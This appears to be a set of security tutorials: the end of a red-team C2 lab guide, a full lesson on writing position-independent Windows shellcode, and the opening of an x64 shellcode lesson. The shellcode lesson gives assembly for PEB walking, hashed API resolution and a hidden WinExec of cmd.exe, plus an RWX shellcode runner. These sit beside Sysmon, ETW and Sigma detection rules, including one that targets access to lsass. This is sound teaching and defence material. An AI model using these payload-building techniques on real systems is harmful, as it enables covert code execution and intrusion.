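A fixed threshold catches low-jitter defaults only; implants configured with wide jitter need longer observation windows or frequency-domain methods.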

Enable Command Line Auditing via GPO (Audit Process Creation → include command line, EID 4688) and forward Microsoft-Windows-PowerShell/Operational (EID 4104) script-block logs to the SIEM. Keep the monitoring tier one-way and unreachable from the attacker subnet.

MITRE ATT&CK Mapping

Technique | MITRE ID | Detection
Command and Control (tactic) | TA0011 | Beacon traffic correlation across SIEM
Application Layer Protocol | T1071 | Sysmon EID 3, Zeek conn.log
Web Protocols | T1071.001 | Non-browser HTTPS to rare destinations
DNS | T1071.004 | Sysmon EID 22, DNS-Client ETW
Proxy / External Proxy | T1090 / T1090.002 | Redirector IP reputation, JA3 anomalies
Domain Fronting | T1090.004 | TLS SNI vs. Host header mismatch
Protocol Tunneling | T1572 | mTLS/DoH volume anomalies
Ingress Tool Transfer | T1105 | Sysmon EID 11, download-and-exec
Acquire Infrastructure: VPS / Domains | T1583.003 / T1583.001 | Newly registered / uncategorized domains
Remote Access Software | T1219 | RMM tools acting as C2

13. Tools for Red Team Lab Analysis

Tool | Description | Link
Sliver | Open-source C2 server, client, implants | sliver.sh
Wazuh | SIEM + EDR agent for the blue tier | wazuh.com
Security Onion | IDS + log management distro | securityonionsolutions.com
Sysmon | Endpoint telemetry (process/network/DNS) | microsoft.com
Zeek | Network metadata and beacon hunting | zeek.org
Terraform | Infrastructure-as-code provisioning | terraform.io
WireGuard | Operator VPN overlay | wireguard.com
Nginx | Redirector reverse proxy | nginx.org

Summary

  • A red team lab is a closed, segmented environment where authorized operators rehearse C2 tradecraft while the blue stack records every event it generates.
  • Tiered host-only networks, snapshot discipline, and a Type-2 hypervisor make scenarios isolated and repeatable.
  • A team server must never be internet-facing; disposable redirectors front it and are rebuilt with infrastructure-as-code when burned.
  • OPSEC is architecture — operator VPN overlays, separated phishing/C2/payload infrastructure, aged domains, and rotated IPs keep operations deniable.
  • Detect C2 with Sysmon EID 3/22, jitter and named-pipe analysis, and Sigma rules, mapping every primitive back to MITRE TA0011.


Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.


1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).


2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:

  • It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
  • It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
  • It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).


3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

| Architecture | Instruction | Result |
| --- | --- | --- |
| x86 | MOV EAX, FS:[0x30] | EAX = TEB.ProcessEnvironmentBlock (PEB) |
| x64 | MOV RAX, GS:[0x60] | RAX = TEB.ProcessEnvironmentBlock (PEB) |

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

| Struct | Field | x86 offset | x64 offset |
| --- | --- | --- | --- |
| _TEB | ProcessEnvironmentBlock | +0x030 | +0x060 |
| _PEB | Ldr | +0x00C | +0x018 |
| _PEB_LDR_DATA | InLoadOrderModuleList | +0x00C | +0x010 |
| _PEB_LDR_DATA | InMemoryOrderModuleList | +0x014 | +0x020 |
| _PEB_LDR_DATA | InInitializationOrderModuleList | +0x01C | +0x030 |
| _LDR_DATA_TABLE_ENTRY | DllBase | +0x018 | +0x030 |
| _LDR_DATA_TABLE_ENTRY | BaseDllName | +0x02C | +0x058 |

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
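The offsets above can be cross-checked offline by modelling the structure with fixed-width fields. The sketch below is an assumption-labelled model, not a copy of any Windows header: it mirrors only the leading fields shown in the listing, uses explicit padding so the layout does not depend on the host platform, and the class names are hypothetical. It also derives the displacement that applies when a pointer targets InMemoryOrderLinks rather than the start of the entry.

```python
import ctypes

def make_layout(ptr_type, pad_after_u32):
    """Build a model of the leading _LDR_DATA_TABLE_ENTRY fields for one pointer width."""
    class ListEntry(ctypes.Structure):
        _fields_ = [("Flink", ptr_type), ("Blink", ptr_type)]

    ustr_fields = [("Length", ctypes.c_uint16), ("MaximumLength", ctypes.c_uint16)]
    if pad_after_u32:
        ustr_fields.append(("_pad", ctypes.c_uint32))   # explicit x64 padding
    ustr_fields.append(("Buffer", ptr_type))

    class UnicodeString(ctypes.Structure):
        _fields_ = ustr_fields

    entry_fields = [
        ("InLoadOrderLinks", ListEntry),
        ("InMemoryOrderLinks", ListEntry),
        ("InInitializationOrderLinks", ListEntry),
        ("DllBase", ptr_type),
        ("EntryPoint", ptr_type),
        ("SizeOfImage", ctypes.c_uint32),
    ]
    if pad_after_u32:
        entry_fields.append(("_pad", ctypes.c_uint32))  # explicit x64 padding
    entry_fields += [("FullDllName", UnicodeString), ("BaseDllName", UnicodeString)]

    class LdrEntry(ctypes.Structure):
        _fields_ = entry_fields

    return LdrEntry

LdrEntry64 = make_layout(ctypes.c_uint64, pad_after_u32=True)
LdrEntry32 = make_layout(ctypes.c_uint32, pad_after_u32=False)

def dllbase_from_memory_links(entry):
    """Displacement to DllBase when the pointer targets InMemoryOrderLinks."""
    return entry.DllBase.offset - entry.InMemoryOrderLinks.offset

if __name__ == "__main__":
    for name, entry in (("x64", LdrEntry64), ("x86", LdrEntry32)):
        print(name, hex(entry.DllBase.offset), hex(entry.BaseDllName.offset),
              hex(dllbase_from_memory_links(entry)))
```

The derived displacement is why code that walks InMemoryOrderModuleList reads DllBase at a smaller offset than the table lists: the Flink pointers land inside each entry, not at its start.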

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field
Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

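The loader populates InMemoryOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. (InInitializationOrderModuleList is ordered differently and does not start with the executable, so the "third entry" shortcut does not carry over to it.) A common shortcut is to grab the third entry’s DllBase without ever comparing a name: fewer bytes, no strings, no signatures.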

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.
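The name-based lookup can be modelled in a few lines. This is a sketch under stated assumptions: the module list is simulated as (BaseDllName, DllBase) pairs with made-up base addresses, and the hash is a ROR-13 over the upper-cased UTF-16LE bytes of the name, which is one common convention rather than the only one.

```python
def ror13(value):
    """Rotate a 32-bit value right by 13 bits."""
    return ((value >> 13) | (value << 19)) & 0xFFFFFFFF

def module_hash(name):
    """Case-insensitive ROR-13 over the UTF-16LE bytes of a module name (assumed scheme)."""
    h = 0
    for byte in name.upper().encode("utf-16-le"):
        h = (ror13(h) + byte) & 0xFFFFFFFF
    return h

def find_module(entries, wanted_hash):
    """Walk (BaseDllName, DllBase) pairs in list order and return the matching base."""
    for name, base in entries:
        if module_hash(name) == wanted_hash:
            return base
    return None

if __name__ == "__main__":
    # Hypothetical list with kernel32 deliberately not in third position.
    loaded = [
        ("app.exe", 0x140000000),
        ("ntdll.dll", 0x7FFA30000000),
        ("KERNELBASE.dll", 0x7FFA10000000),
        ("KERNEL32.DLL", 0x7FFA20000000),
    ]
    print(hex(find_module(loaded, module_hash("kernel32.dll"))))
```

Because the comparison is on a hash of the normalised name, the lookup no longer depends on list position or on the casing the loader recorded.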


5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

AddressOfNames and AddressOfNameOrdinals are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, and the 16-bit value o stored there indexes AddressOfFunctions[o]. The name and function entries are RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].
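The lookup described above can be exercised against a synthetic buffer. The sketch below builds a tiny fake "image" that contains only an export directory and its three tables (no DOS or NT headers), then resolves names through the names → ordinals → functions indirection. The export names, RVAs, and buffer layout are invented for illustration; only the IMAGE_EXPORT_DIRECTORY field offsets come from the text.

```python
import struct

def build_image():
    """Assemble a zero-filled buffer holding a hypothetical export directory."""
    img = bytearray(0x200)
    names = [b"Alpha", b"Beta", b"Gamma"]
    ordinals = [2, 0, 1]                     # name i -> index into the function table
    functions = [0x1000, 0x1100, 0x1200]     # function RVAs
    exp, names_rva, ords_rva, funcs_rva, strs = 0x40, 0x80, 0xA0, 0xB0, 0x100
    struct.pack_into("<I", img, exp + 0x18, len(names))   # NumberOfNames
    struct.pack_into("<I", img, exp + 0x1C, funcs_rva)    # AddressOfFunctions
    struct.pack_into("<I", img, exp + 0x20, names_rva)    # AddressOfNames
    struct.pack_into("<I", img, exp + 0x24, ords_rva)     # AddressOfNameOrdinals
    for i, name in enumerate(names):
        struct.pack_into("<I", img, names_rva + 4 * i, strs)
        img[strs:strs + len(name)] = name    # NUL terminator comes from the zero fill
        strs += len(name) + 1
        struct.pack_into("<H", img, ords_rva + 2 * i, ordinals[i])
        struct.pack_into("<I", img, funcs_rva + 4 * i, functions[i])
    return bytes(img), exp

def read_cstr(img, rva):
    """Read a NUL-terminated byte string starting at rva."""
    return img[rva:img.index(b"\x00", rva)]

def resolve(img, exp_rva, wanted, image_base=0):
    """Return image_base + function RVA for an exported name, or None."""
    count, funcs, names, ords = struct.unpack_from("<IIII", img, exp_rva + 0x18)
    for i in range(count):
        name_rva = struct.unpack_from("<I", img, names + 4 * i)[0]
        if read_cstr(img, name_rva) == wanted:
            ordinal = struct.unpack_from("<H", img, ords + 2 * i)[0]
            func_rva = struct.unpack_from("<I", img, funcs + 4 * ordinal)[0]
            return image_base + func_rva
    return None

if __name__ == "__main__":
    image, export_rva = build_image()
    print(hex(resolve(image, export_rva, b"Alpha", image_base=0x7FF800000000)))
```

Note that the ordinal table holds 16-bit indices while the other two tables hold 32-bit RVAs, which is why the strides differ (2 bytes versus 4).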


Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime
The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

// Pre-computed constants for the routine above (function name only; recompute for your toolchain):
// LoadLibraryA   -> 0xEC0E4E8E   (0x0726774C is Metasploit block_api's combined module+function hash)
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.
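For analysts who need to recompute or recognise these constants, the same routine is straightforward to reproduce in Python. This is a minimal sketch of the function-name-only variant (rotate, then add each byte, stopping before the NUL); the helper names are illustrative.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name):
    """ROR-13 additive hash over the bytes of an export name."""
    h = 0
    for byte in name:
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h

def build_lookup(names):
    """Map hash -> name so constants found in a sample can be translated back."""
    return {ror13_hash(n): n.decode("ascii") for n in names}

if __name__ == "__main__":
    table = build_lookup([b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc", b"ExitProcess"])
    for value, name in sorted(table.items()):
        print(f"0x{value:08X}  {name}")
```

With this routine LoadLibraryA hashes to 0xEC0E4E8E. Constants taken from Metasploit's block_api differ because that stub also folds a hash of the module name into the value, so a reverse-lookup table should be built with whichever variant the sample actually uses.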


7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.


8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

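; Build "cmd.exe\0" on the stack (8 bytes including NUL)
; 'cmd.exe' is only 7 bytes, so a plain mov rax, 0x006578652E646D63 would
; encode 0x00 as the top byte of the immediate. Load a padded value and shift instead.
    mov   rax, 0x6578652E646D63FF   ; 'cmd.exe' above a low filler byte (no zero in the encoding)
    shr   rax, 8                    ; drop the filler; the top byte becomes the NUL terminator
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0" (first arg for WinExec)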
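Whether a string immediate is really null-free is easy to check before assembling. The sketch below packs a candidate value the way a 64-bit immediate is laid out in the instruction stream and reports any zero bytes; the helper names are illustrative, and the 0xFF filler is an arbitrary non-zero byte chosen for the example.

```python
import struct

def imm64_bytes(value):
    """Little-endian bytes of a 64-bit immediate as they appear in the opcode stream."""
    return struct.pack("<Q", value)

def nul_offsets(blob):
    """Offsets of zero bytes inside a byte string."""
    return [i for i, b in enumerate(blob) if b == 0]

if __name__ == "__main__":
    plain = int.from_bytes(b"cmd.exe", "little")         # 7 characters: top byte is zero
    padded = int.from_bytes(b"\xffcmd.exe", "little")    # filler byte in the low position
    print(imm64_bytes(plain), nul_offsets(imm64_bytes(plain)))
    print(imm64_bytes(padded), nul_offsets(imm64_bytes(padded)))
    print(hex(padded >> 8))                              # shifting recovers the plain value
```

Any string shorter than eight bytes leaves zero bytes at the top of a qword immediate, so it needs padding plus a shift, or an XOR/NOT mask, to stay null-free.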

Eliminate accidental nulls in opcodes:

| Avoid | Use instead | Reason |
| --- | --- | --- |
| mov rax, 0 (48 C7 C0 00 00 00 00) | xor rax, rax | Removes four NUL bytes |
| push 0 (6A 00) | xor reg, reg; push reg | 6A 00 contains a NUL |
| Short jumps spanning NUL displacements | Pad with nop or reorder code | Avoids NUL in the offset byte |
| mov al, 0x00 | xor al, al | Same fix at byte width |

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.


9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

  1. RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
  2. The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are placed on the stack above the shadow space. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile registers (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once the API is resolved in RAX
; Assumes the "cmd.exe" stack string is still at the top of the stack.
    mov   rcx, rsp                  ; lpCmdLine: capture the pointer before RSP moves
    and   rsp, -16                  ; force 16-byte alignment (shifts RSP by 0 or 8)
    sub   rsp, 32                   ; shadow space (home space)

    xor   edx, edx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION on an aligned SSE instruction (movaps / movdqa against a stack slot) inside kernel32 or ntdll, a tell-tale crash signature when reviewing payloads.


10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

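A quick Python harness sanity-checks the extracted blob: it reports the size, flags embedded nulls, and dumps a C array for the test loader. It does not prove position independence on its own; confirming that the object carries no relocations is a separate check.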

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.


11. Common Attacker Techniques

| Technique | Description |
| --- | --- |
| PEB walking | Resolve kernel32/ntdll bases via GS:[0x60] / FS:[0x30] without imports |
| Export hash resolution | ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings |
| Stack strings | Push immediates to materialise "cmd.exe", "WinExec", etc., on the stack |
| Reflective loading | PIC stub maps a full DLL into memory and calls its DllMain (T1620) |
| Remote injection | VirtualAllocEx + WriteProcessMemory + CreateRemoteThread into a target PID |
| APC queuing | QueueUserAPC to deliver shellcode into an alertable thread |
| Process hollowing | Suspend a benign process, unmap its image, write PIC payload, resume |
| Module stomping | Overwrite the .text of a legitimately loaded DLL with PIC shellcode |

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

| Event ID | Signal |
| --- | --- |
| 1 | Process creation (with command line); anomalous parents (winword.exe → cmd.exe) |
| 7 | ImageLoad from user-writable paths into system processes |
| 8 | CreateRemoteThread: primary remote-injection signal |
| 10 | ProcessAccess with GrantedAccess containing 0x1F0FFF, 0x1410, or PROCESS_VM_WRITE \| PROCESS_VM_OPERATION \| PROCESS_CREATE_THREAD |
| 17/18 | Named pipe creation/connection (common C2 channel) |
| 25 | ProcessTampering (image hollowing) |

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires the consumer to run as an anti-malware Protected Process Light (PPL), which in turn depends on a signed ELAM driver; that is why EDR vendors, not generic SIEMs, own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS (pre-Vista value, still widely requested)
      - '0x1410'      # QUERY_LIMITED_INFORMATION|QUERY_INFORMATION|VM_READ (read-only dump mask)
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high
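When triaging EID 10 hits it helps to decode GrantedAccess into named rights instead of matching hex strings by eye. The sketch below uses the documented process access-right bit values; the function names and the choice of which rights count as "injection capable" (VM_OPERATION, VM_WRITE, and CREATE_THREAD together) are assumptions made for illustration.

```python
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Rights a classic allocate/write/start-thread injection needs on the target.
INJECTION_MASK = 0x0008 | 0x0020 | 0x0002

def to_int(mask):
    """Accept either an int or a Sysmon-style hex string such as '0x1410'."""
    return int(mask, 16) if isinstance(mask, str) else mask

def decode(mask):
    """List the known process-specific rights present in a GrantedAccess value."""
    value = to_int(mask)
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if value & bit]

def can_inject(mask):
    """True when the mask includes every right in INJECTION_MASK."""
    return (to_int(mask) & INJECTION_MASK) == INJECTION_MASK

if __name__ == "__main__":
    for sample in ("0x1410", "0x1F0FFF", "0x002A"):
        print(sample, can_inject(sample), decode(sample))
```

Decoding shows that 0x1410 grants query and read access only, which fits memory-reading activity such as credential dumping rather than a write-and-execute injection.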

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.

Hardening:

| Mitigation | Effect |
| --- | --- |
| ACG (ProcessDynamicCodePolicy) | Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE) |
| DEP / NX | Hardware-enforced non-execute on data pages |
| CFG | Invalidates indirect calls to non-registered targets |
| HVCI | Hypervisor-enforced kernel code integrity |
| ASR rules | Block office/script children, untrusted USB execution, etc. |
| Restrict SeDebugPrivilege | Limits which accounts can open and write to other processes |

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations
Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

| Tool | Description | Link |
| --- | --- | --- |
| WinDbg | Verify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY) | microsoft.com |
| NASM | Assemble x86/x64 PIC payloads in Intel syntax | nasm.us |
| x64dbg | Dynamic analysis of shellcode in a loader harness | x64dbg.com |
| Ghidra / IDA | Static disassembly of extracted opcodes | ghidra-sre.org |
| Process Hacker | Inspect process memory regions and protections | processhacker.sf.io |
| pe-sieve | Hunts injected, hollowed, or stomped modules | github.com/hasherezade/pe-sieve |
| Volatility 3 | malfind, ldrmodules, vadinfo for memory-resident PIC | volatilityfoundation.org |
| YARA | Signature ROR-13 loops, PEB-walk prologues, hash tables | virustotal.github.io/yara |
| SilkETW | Subscribe to THREATINT and Kernel-Process providers | github.com/mandiant/SilkETW |

14. MITRE ATT&CK Mapping

| Technique | MITRE ID | Detection |
| --- | --- | --- |
| Reflective Code Loading | T1620 | Volatility malfind / ldrmodules; THREATINT ETW |
| Process Injection (parent) | T1055 | Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM |
| Process Injection: DLL | T1055.001 | Sysmon EID 7 from unusual paths; pe-sieve |
| Process Injection: APC | T1055.004 | Kernel-Process ETW thread events on alertable waits |
| Process Injection: Hollowing | T1055.012 | Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 hash loops and stack-string push sequences |
| Command and Scripting Interpreter | T1059 | EID 4688 / Sysmon EID 1 with command-line auditing |

Summary

  • Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
  • The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll in a handful of pointer dereferences without any string comparison.
  • Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
  • Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
  • Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.


Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.


1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

| Item | x86 | x64 |
| --- | --- | --- |
| General-purpose registers | 8 × 32-bit (EAX–EDI) | 16 × 64-bit (RAX–R15) |
| Windows calling convention | stdcall / cdecl: all args on stack | Unified fast-call: first 4 integer args in registers |
| TEB segment register | FS; PEB at fs:[0x30] | GS; PEB at gs:[0x60] |
| Address width | 32-bit | 64-bit (48-bit canonical VA in practice) |
| call pushes | 4-byte return address | 8-byte return address |
| RIP-relative addressing | Not available | Available; lea rax, [rip + offset] is idiomatic in PIC |

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.


